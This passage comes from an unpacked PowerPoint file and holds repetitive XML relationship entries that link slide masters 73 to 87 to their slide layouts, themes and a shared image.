Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout720.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout711.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster73.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout729.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout728.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout727.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout726.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout725.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout724.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout723.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout722.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme73.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout730.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout721.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout739.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout738.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout737.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout736.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout735.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout734.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout733.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout732.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme74.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout740.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout731.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout749.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout748.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout747.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout746.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout745.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout744.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout743.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout742.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme75.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout750.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout741.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout759.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout758.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout757.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout756.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout755.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout754.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout753.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout752.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme76.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout760.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout751.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster77.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout769.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout768.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout767.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout766.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout765.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout764.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout763.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout762.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme77.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout770.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout761.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster78.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout779.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout778.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout777.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout776.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout775.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout774.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout773.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout772.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme78.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout780.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout771.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout789.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout788.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout787.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout786.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout785.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout784.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout783.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout782.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout790.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout781.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout79.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout77.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout76.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout75.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout74.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout73.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout72.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout80.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout71.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout799.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout798.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout797.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout796.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout795.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout794.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout793.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout792.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme80.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout800.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout791.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout809.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout808.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout807.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout806.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout805.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout804.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout803.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout802.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme81.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout810.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout801.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout819.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout818.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout817.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout816.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout815.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout814.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout813.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout812.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme82.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout820.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout811.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout829.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout828.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout827.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout826.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout825.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout824.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout823.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout822.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme83.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout830.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout821.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout839.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout838.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout837.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout836.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout835.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout834.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout833.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout832.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme84.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout840.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout831.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout849.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout848.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout847.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout846.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout845.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout844.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout843.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout842.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme85.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout850.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout841.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout859.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout858.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout857.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout856.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout855.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout854.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout853.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout852.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme86.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout860.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout851.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout869.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout868.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout867.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout866.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout865.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout864.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout863.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout862.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme87.xml"/><Relationship Id="rId11" 